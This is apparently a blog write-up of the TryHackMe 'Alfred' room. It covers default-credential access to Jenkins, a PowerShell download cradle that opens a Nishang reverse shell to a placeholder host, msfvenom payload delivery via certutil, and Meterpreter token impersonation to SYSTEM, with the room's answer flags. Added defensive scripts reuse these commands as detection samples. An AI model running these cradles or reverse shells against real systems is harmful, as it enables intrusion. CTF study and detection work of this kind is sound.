Alfred : TryHackMe Writeup

0liverFlow
8 min read · Jun 22, 2023


Alfred — THM

Alfred is an interesting room on TryHackMe that consists of exploiting Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

In this walkthrough, you will learn how to:

  • Exploit a security misconfiguration vulnerability
  • Gain initial access to the target system using Nishang’s Invoke-PowerShellTcp reverse shell script
  • Switch from a command shell to a Meterpreter shell
  • Exploit Windows authentication tokens to escalate your privileges

[Task 1] — Initial access

In this room, we’ll learn how to exploit a common misconfiguration on a widely used automation server (Jenkins — this tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they have made changes to it). After that, we’ll use an interesting privilege escalation method to get full system access.

Since this is a Windows application, we’ll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we’ll be using the reverse shell scripts.

1°) How many ports are open? (TCP only)

Answer: 3 ✅

[Screenshot: Nmap SYN scan]

2°) What is the username and password for the login panel? (in the format username:password)

In order to find the login panel’s username and password, we are going to use hydra.

However, before using hydra we first need to find the HTTP method used as well as the parameters involved when the login form is submitted.

For that, we are going to intercept the request using Burp Suite’s Proxy feature.

[Screenshot: Burp Suite Proxy]

Answer: admin:admin ✅

Nevertheless, a faster way to determine the credentials is simply to ask our best friend, Google:

After taking a look at the different webpages, it was clear that the default username was admin. However, I struggled a bit before finding the default password. I tried “password” but it didn’t work. Then, I found the answer thanks to Stack Overflow \o/

NOTE📝: When it comes to finding the credentials of a CMS or any particular technology, it is always good practice to google for default credentials before attempting any brute force attack. This will save a huge amount of time.

3°) Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

[Screenshot: Jenkins server welcome page]

You first need to download the PowerShell script and make it available for the server to download. You can do this by creating an HTTP server with Python: python3 -m http.server.

For that, we are going to first download Nishang’s Invoke-PowerShellTcp script, which connects back to a standard netcat listener on a given port when the -Reverse switch is used.

Let’s now launch a Python web server so that the target system can download the script from our machine.

Once the Python web server is running, we will use the Jenkins server’s Configure feature to configure the project.

NOTE📝: Do not forget to specify the Windows command to execute in the Build section, then apply and save.

The figures below show how this can be done:

After applying and saving the configuration on the Configure tab, let’s set up a Python web server and a netcat listener in order to serve the PowerShell script and receive the reverse shell respectively.

Once the listener and the Python server are set up, let’s download and run the Invoke-PowerShellTcp script using the Jenkins server’s Build Now feature:

Great, let’s now take a look at our Python web server and the netcat listener:

[Screenshot: downloading the Invoke-PowerShellTcp script]
[Screenshot: receiving a reverse shell]
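The misconfiguration exploited above is a Jenkins job whose build step hands an arbitrary command to the operating system. From the defender’s side, the same fact can be audited at rest: Jenkins stores an “Execute Windows batch command” step as hudson.tasks.BatchFile and an “Execute shell” step as hudson.tasks.Shell, each with a command child, inside the job’s config.xml. The script below is an added example written for this write-up (it is not the author’s code and not part of Jenkins); the job XML it parses is constructed for the example, and the ATTACKER-IP values in it are placeholders.

```python
"""Audit a Jenkins job config.xml for build steps that execute OS commands.

Added example for this write-up (not the author's code and not part of the
Jenkins project). Jenkins stores an "Execute Windows batch command" build step
as <hudson.tasks.BatchFile> and an "Execute shell" step as <hudson.tasks.Shell>,
each with a <command> child. The job XML below is constructed for the example;
ATTACKER-IP is a placeholder.
"""
import re
import xml.etree.ElementTree as ET

# Build-step element names that hand an arbitrary command to the OS.
COMMAND_STEPS = ("hudson.tasks.BatchFile", "hudson.tasks.Shell")

# Strings that rarely appear in a legitimate build step but are typical of a
# download-and-execute cradle such as the one used in Task 1.
CRADLE_PATTERNS = [
    re.compile(r"DownloadString|DownloadFile", re.IGNORECASE),
    re.compile(r"\biex\b|Invoke-Expression", re.IGNORECASE),
    re.compile(r"certutil\b.*-urlcache", re.IGNORECASE),
    re.compile(r"Invoke-PowerShellTcp|-Reverse\b", re.IGNORECASE),
]

# Constructed sample: one malicious batch step and one ordinary build step.
SAMPLE_CONFIG = """<project>
  <description>constructed sample job</description>
  <builders>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER-IP -Port 4444</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.Shell>
      <command>mvn -B clean package</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""


def extract_command_steps(config_xml: str) -> list[tuple[str, str]]:
    """Return (step_type, command) for every OS-command build step in the job."""
    root = ET.fromstring(config_xml)
    steps = []
    for element in root.iter():
        if element.tag in COMMAND_STEPS:
            command = (element.findtext("command") or "").strip()
            steps.append((element.tag, command))
    return steps


def audit_job(config_xml: str) -> list[dict]:
    """Flag command steps whose text matches a download-cradle pattern."""
    findings = []
    for step_type, command in extract_command_steps(config_xml):
        matched = [p.pattern for p in CRADLE_PATTERNS if p.search(command)]
        findings.append({
            "step": step_type,
            "command": command,
            "suspicious": bool(matched),
            "matched": matched,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_job(SAMPLE_CONFIG):
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"[{flag}] {finding['step']}: {finding['command'][:70]}")
```

On a real controller you would run audit_job over every $JENKINS_HOME/jobs/*/config.xml. The pattern list only catches the obvious cradles; the root cause in this room is that the admin account uses default credentials and may edit any job, so the durable fix is changing those credentials and restricting Job/Configure rights rather than pattern-matching build steps.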

4°) What is the user.txt flag?

Answer: 79007a09481963edf2e1321abd9ae2a0 ✅

[Task 2 ] — Switching Shells

Generating a payload using msfvenom:

Let’s break down msfvenom’s options:

-p : the payload to use

-a : the architecture to use (x86 for 32-bit architecture and x64 for 64-bit architecture)

-e : the encoder to use (The purpose of encoding a payload is to make it less detectable by anti-virus software).

-i : the number of times to encode the payload.

-f : output format to use

-o : save the payload to a file

What is the final size of the exe payload that you generated?

Answer: 73802 ✅

Running a Python HTTP server:

Downloading the payload on the target system using certutil command:

Checking our Python http server:
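Both downloads performed so far (the PowerShell cradle launched from the Jenkins build step in Task 1, and the certutil download of the msfvenom payload here) leave the same kind of trace: a download-capable system binary spawned from the Jenkins process chain with a URL on its command line. The script below is an added example for this write-up (not the author’s code) that applies that detection logic to process-creation telemetry. The records are constructed to resemble Sysmon Event ID 1 fields (Image, CommandLine, ParentImage, User); the paths, the ALFRED\jenkins-svc account and ATTACKER-IP are placeholders.

```python
"""Flag LOLBin download cradles in process-creation telemetry.

Added example for this write-up (not the author's code). The records below
are constructed to resemble Sysmon Event ID 1 fields (Image, CommandLine,
ParentImage, User) for the two downloads performed in the write-up: the
PowerShell cradle run from the Jenkins build step and the certutil download
of the msfvenom payload. Paths, the account name and ATTACKER-IP are
placeholders.
"""
import ntpath

# Legitimate binaries that are routinely reused to fetch payloads.
DOWNLOAD_CAPABLE = {"powershell.exe", "certutil.exe", "bitsadmin.exe"}

# Command-line fragments that mean "fetch something from the network".
DOWNLOAD_INDICATORS = ("-urlcache", "downloadstring", "downloadfile",
                       "invoke-webrequest", "bitsadmin /transfer")

# Parents in the Jenkins build chain (jenkins.exe -> java.exe -> cmd.exe -> ...).
CI_PARENTS = {"java.exe", "cmd.exe", "powershell.exe"}

# Constructed telemetry: one record per line, pipe-separated key=value pairs.
SAMPLE_EVENTS = r"""
Image=C:\Program Files\Java\jre\bin\java.exe|CommandLine=java -jar jenkins.war|ParentImage=C:\Program Files\Jenkins\jenkins.exe|User=ALFRED\jenkins-svc
Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c call build.bat|ParentImage=C:\Program Files\Java\jre\bin\java.exe|User=ALFRED\jenkins-svc
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP:8000/Invoke-PowerShellTcp.ps1')|ParentImage=C:\Windows\System32\cmd.exe|User=ALFRED\jenkins-svc
Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -urlcache -split -f http://ATTACKER-IP:8000/payload.exe payload.exe|ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|User=ALFRED\jenkins-svc
Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -hashfile C:\build\app.msi SHA256|ParentImage=C:\Windows\System32\cmd.exe|User=ALFRED\jenkins-svc
"""


def parse_events(text: str) -> list[dict]:
    """Turn the key=value|key=value lines into one dict per event."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(part.split("=", 1) for part in line.split("|"))
        events.append(fields)
    return events


def detect_download_cradles(text: str) -> list[dict]:
    """Return one finding per download-capable binary given a fetch command."""
    findings = []
    for event in parse_events(text):
        image = ntpath.basename(event["Image"]).lower()
        parent = ntpath.basename(event["ParentImage"]).lower()
        cmdline = event["CommandLine"].lower()
        if image not in DOWNLOAD_CAPABLE:
            continue
        hits = [ind for ind in DOWNLOAD_INDICATORS if ind in cmdline]
        if not hits:
            continue  # e.g. certutil -hashfile is a normal build-time use
        findings.append({
            "image": image,
            "parent": parent,
            "user": event["User"],
            "indicators": hits,
            "from_ci_chain": parent in CI_PARENTS,
        })
    return findings


if __name__ == "__main__":
    for f in detect_download_cradles(SAMPLE_EVENTS):
        print(f"{f['image']} <- {f['parent']} ({f['user']}): {f['indicators']}")
```

The fifth record (certutil -hashfile) is deliberately benign so that the rule shows it keys on the download switches, not on certutil itself. The from_ci_chain flag is what separates a developer experimenting at a console from commands spawned by the build service, which is where this room’s activity sits.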

Setting up a Metasploit handler:

Running the payload on the target system:

Checking if we got a meterpreter shell:

[Task 3] — Privilege Escalation

Now that we have initial access, let’s use token impersonation to gain system access.

Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe (think of this as an authentication process).

This access token consists of:

  • User SIDs (security identifiers)
  • Group SIDs
  • Privileges

Amongst other things. More detailed information can be found here.

There are two types of access tokens:

  • Primary access tokens: those associated with a user account that are generated on log on.
  • Impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process.

For an impersonation token, there are different levels:

  • SecurityAnonymous: current user/client cannot impersonate another user/client.
  • SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client.
  • SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
  • SecurityDelegation: current user/client can impersonate the client’s security context on a remote system

Here, the security context is a data structure that contains the user’s relevant security information.

The privileges of an account (which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

NOTE📝: The process of impersonating access tokens to elevate our privileges on a system will depend on the privileges assigned to the account that has been exploited to gain initial access as well as the impersonation or delegation tokens available.

There’s more reading here.

1°) View all the privileges using whoami /priv

An alternative to whoami /priv consists of using the meterpreter’s getprivs command as follows:

2°) You can see that two privileges (SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability.
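Before moving on to incognito, it is worth seeing how the same check looks from an auditor’s side: the commonly abused privileges listed above are worth reporting whenever a service account holds them, and a privilege that whoami /priv shows as Disabled still counts, because any process running as that account can enable a held privilege with AdjustTokenPrivileges. The script below is an added example for this write-up (not the author’s code); it parses whoami /priv output in the format the command prints, using a constructed sample that shows fewer rows than the real box, and flags the privileges from the Task 3 list.

```python
"""Parse `whoami /priv` output and flag commonly abused privileges.

Added example for this write-up (not the author's code). The sample output
below is constructed in the format `whoami /priv` prints; the privilege list
is the one given in Task 3. A held privilege shown as Disabled is still a
risk, since a process running as that account can enable it with
AdjustTokenPrivileges, so the audit reports held privileges as well as
enabled ones.
"""

# Commonly abused privileges, as listed in Task 3.
ABUSABLE_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeTcbPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeCreateTokenPrivilege",
    "SeLoadDriverPrivilege",
    "SeTakeOwnershipPrivilege",
    "SeDebugPrivilege",
}

# Constructed `whoami /priv` output for a service account like the one running
# Jenkins in this room (the real box prints more rows).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
"""


def parse_privileges(output: str) -> dict[str, str]:
    """Map privilege name -> state ("Enabled"/"Disabled") from whoami /priv text."""
    privileges = {}
    for line in output.splitlines():
        parts = line.split()
        # Data rows start with the privilege name and end with its state;
        # the header, separator and blank lines never match this shape.
        if (len(parts) >= 3 and parts[0].startswith("Se")
                and parts[-1] in ("Enabled", "Disabled")):
            privileges[parts[0]] = parts[-1]
    return privileges


def abusable_held(output: str) -> list[str]:
    """Abusable privileges the account holds at all, whatever their state."""
    return [name for name in parse_privileges(output) if name in ABUSABLE_PRIVILEGES]


def abusable_enabled(output: str) -> list[str]:
    """Abusable privileges currently enabled in the token."""
    return [name for name, state in parse_privileges(output).items()
            if name in ABUSABLE_PRIVILEGES and state == "Enabled"]


if __name__ == "__main__":
    print("held   :", abusable_held(SAMPLE_WHOAMI_PRIV))
    print("enabled:", abusable_enabled(SAMPLE_WHOAMI_PRIV))
```

Run against the output captured from the Jenkins shell, abusable_enabled returns exactly the two privileges the question points at, and abusable_held shows the wider set that would matter if the account’s token were ever used from a process that re-enabled them. The mitigation follows directly: run Jenkins under a dedicated account that does not hold SeImpersonatePrivilege or SeDebugPrivilege, so that the token impersonation in the next steps has nothing to work with.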

Enter: load incognito to load the incognito module in Metasploit. Please note that you may need to use the use incognito command if the previous command doesn’t work. Also, ensure that your Metasploit is up to date.

The Incognito module is a built-in Meterpreter module; it was originally a standalone application that allows you to impersonate user tokens after successful exploitation.

3°) To check which tokens are available, enter list_tokens -g. We can see that the BUILTIN\Administrators token is available.

Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators’ token. What is the output when you run the getuid command?

Let’s first take a look at the help menu of the list_tokens command:

[Screenshot: delegation-level tokens]
[Screenshot: impersonation-level tokens]

Answer: NT AUTHORITY\SYSTEM ✅

4°) Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).

Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS

5°) Read the root.txt file located at C:\Windows\System32\config

Answer: dff0f748678f280250f25a45b8046b4a ✅

Well done guys 👏!

That’s all for this Capture The Flag.

Do not forget to click on the little clap icon below if you enjoyed the content.

Furthermore, thanks for subscribing to my newsletter to keep up with my latest articles.
